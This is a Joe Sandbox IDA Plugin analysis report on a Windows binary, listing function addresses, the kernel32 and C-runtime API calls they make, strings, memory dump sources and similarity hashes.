Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction ID: b1e6abc05a0e714eea7ee24824e91e37d24118dd64ed21094c54dbcfe939301a
Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
Instruction Fuzzy Hash: FB116D2AB0F64246FA5BA32595B173922929F457F4F444735E83E067C7EE2CE442820A

Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014001385B
LeaveCriticalSection.KERNEL32 ref: 0000000140013872
SetEvent.KERNEL32 ref: 000000014001387F
WaitForSingleObject.KERNEL32 ref: 0000000140013891
CloseHandle.KERNEL32 ref: 000000014001389E
CloseHandle.KERNEL32 ref: 00000001400138AB

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
String ID:
API String ID: 3326452711-0
Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705

Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 00000001400037D3
#4.VSELOG ref: 0000000140003823
EnterCriticalSection.KERNEL32 ref: 000000014000382F
LeaveCriticalSection.KERNEL32 ref: 00000001400038B7

Strings

amps_Exec: pHandle=%p, execId=%d, iParam=%d, xrefs: 000000014000380B

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
API String ID: 2984211723-1229430080
Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740

Function 00007FFDAC127F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFDAC127F4D
GetProcAddress.KERNEL32 ref: 00007FFDAC127F63
FreeLibrary.KERNEL32 ref: 00007FFDAC127F8A

Strings

mscoree.dll, xrefs: 00007FFDAC127F44
CorExitProcess, xrefs: 00007FFDAC127F5C

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction ID: d5ea28a4eb2c3bec6b919820866867bf3b018ad908cf67afd77e86528c9d2c13
Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
Instruction Fuzzy Hash: 62F06267B1AA06C1EB619B24E46433A6360AF857F5F940335CA7D467F6CF2CD049C348

Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
ExitProcess.KERNEL32 ref: 0000000140008545

Strings

mscoree.dll, xrefs: 0000000140008518
CorExitProcess, xrefs: 000000014000852A

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: AddressExitHandleModuleProcProcess
String ID: CorExitProcess$mscoree.dll
API String ID: 75539706-1276376045
Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340

Function 00007FFDAC1240D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON

Download Yara Rule

APIs

__AdjustPointer.LIBCMT ref: 00007FFDAC1241F7
__AdjustPointer.LIBCMT ref: 00007FFDAC124242

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction ID: f2c7d4a09ba2303e02de8b844164bfadfb00c33b700775c43d00b49aece5796c
Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
Instruction Fuzzy Hash: B6B1C43BB0BA9281EA67DB5694603386394EF55BE4F198835DE4D07787DF3CE441830A

Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32 ref: 0000000140009F76

Part of subcall function 0000000140008370: Sleep.KERNEL32(?,?,00000000,0000000140005545), ref: 00000001400083C0

GetFileType.KERNEL32 ref: 000000014000A11C

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: FileInfoSleepStartupType
String ID:
API String ID: 1527402494-0
Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301

Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E3E
GetLastError.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E5E
GetCommandLineA.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009E9B
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,0000000140005C5B), ref: 0000000140009EBB

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: CommandLine$ByteCharErrorLastMultiWide
String ID:
API String ID: 3078728599-0
Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00

Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDAC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDC7

Part of subcall function 0000000140010B30: CreateFileA.KERNEL32 ref: 0000000140010B5A

GetConsoleOutputCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000C780), ref: 000000014000FDDC
WideCharToMultiByte.KERNEL32 ref: 000000014000FE0D
WriteConsoleA.KERNEL32 ref: 000000014000FE32

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
String ID:
API String ID: 1850339568-0
Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00

Function 00007FFDAC12FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDAC12FB7C
_set_statfp.LIBCMT ref: 00007FFDAC12FB97
_set_statfp.LIBCMT ref: 00007FFDAC12FBB3
_set_statfp.LIBCMT ref: 00007FFDAC12FBEF

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction ID: 3aff81450bb73b8502c729245f7b9ad427d3e1f38c375906599a2cd5406083db
Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
Instruction Fuzzy Hash: 5411987BF19A2B01F75A5224E57637910416F993F4F140634E96F067DFCE2CE841498B

Function 00007FFDAC129684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FFDAC12766F,?,?,00000000,00007FFDAC12790A,?,?,?,?,?,00007FFDAC127896), ref: 00007FFDAC1296A3
FlsSetValue.KERNEL32(?,?,?,00007FFDAC12766F,?,?,00000000,00007FFDAC12790A,?,?,?,?,?,00007FFDAC127896), ref: 00007FFDAC1296C2
FlsSetValue.KERNEL32(?,?,?,00007FFDAC12766F,?,?,00000000,00007FFDAC12790A,?,?,?,?,?,00007FFDAC127896), ref: 00007FFDAC1296EA
FlsSetValue.KERNEL32(?,?,?,00007FFDAC12766F,?,?,00000000,00007FFDAC12790A,?,?,?,?,?,00007FFDAC127896), ref: 00007FFDAC1296FB
FlsSetValue.KERNEL32(?,?,?,00007FFDAC12766F,?,?,00000000,00007FFDAC12790A,?,?,?,?,?,00007FFDAC127896), ref: 00007FFDAC12970C

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction ID: 61017bcb5705dc7fe04f46212e3db15c59f26891a1792d5145e834cf63376696
Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
Instruction Fuzzy Hash: D611812AF0F64346FA5AA72965B177921829F443F0F544734E87E067C7FE2CE442860A

Function 00007FFDAC129518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FFDAC129529
FlsSetValue.KERNEL32 ref: 00007FFDAC129548
FlsSetValue.KERNEL32 ref: 00007FFDAC129570
FlsSetValue.KERNEL32 ref: 00007FFDAC129581
FlsSetValue.KERNEL32 ref: 00007FFDAC129592

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction ID: 191121dd7a82363feee6530283f49dc0cb3f8842280864357726010afbfb317c
Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
Instruction Fuzzy Hash: 6511E85AB0F6078AFAABA729547137921818F453F4E580B35D93E0A3D7FD2CF441860B

Function 00007FFDAC125448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFDAC1254B8
_CallSETranslator.LIBVCRUNTIME ref: 00007FFDAC125503

Strings

RCC, xrefs: 00007FFDAC1254D4
MOC, xrefs: 00007FFDAC1254CC

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction ID: b7dcc799c58709455bc09dadbe1ff34e1a1865f8adda208c6f4d0339921d6923
Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
Instruction Fuzzy Hash: A591B177B097818AEB12CB64D8903AD7BA0FB447D8F10413AEA8D17756DF38D196CB05

Function 00007FFDAC123A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDAC123A63
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FFDAC123AFA
RtlUnwindEx.KERNEL32 ref: 00007FFDAC123B54

Strings

csm, xrefs: 00007FFDAC123AE1

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: ca4c08eb1a6585e7502a0a59cac48488844cac0c91e595dffc6731063ca994bf
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: F051F437B0A6028ADB15CF19E464B787399EB44BE8F908131DA4E4378ADF7CE841C709

Function 00007FFDAC1259C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFDAC1259F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFDAC125AD8

Strings

csm, xrefs: 00007FFDAC125A12
csm, xrefs: 00007FFDAC125B2A

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: 99227ad17698f2faf31985c55b6072d19f64e6a40f70fb4c3e67683794dd7a1e
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: 4451AD3BB0A3828AEF658B1194A437877A1EB55BE8F544135DA8D43B86CF3CE451C70A

Function 00007FFDAC1251D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFDAC125237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFDAC125283

Strings

MOC, xrefs: 00007FFDAC12524B
RCC, xrefs: 00007FFDAC125253

Memory Dump Source

Source File: 00000005.00000002.3177617960.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000005.00000002.3177603006.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177642546.00007FFDAC132000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177661523.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.3177682313.00007FFDAC13F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdac120000_4mPVjj.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: 9e45db018b5ff397d434bbcc059dfb3204c2198b2d39b41056ecdac807437511
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: E0618F37B09BC581DA218B15E4903AAB7A0FB857E8F544235EB9C07B96DF7CD190CB05

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38
kernel32.dll, xrefs: 000000014000EE26

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_140000000_4mPVjj.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000005.00000002.3177527095.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000005.00000002.3177504937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177569033.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.3177585860.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

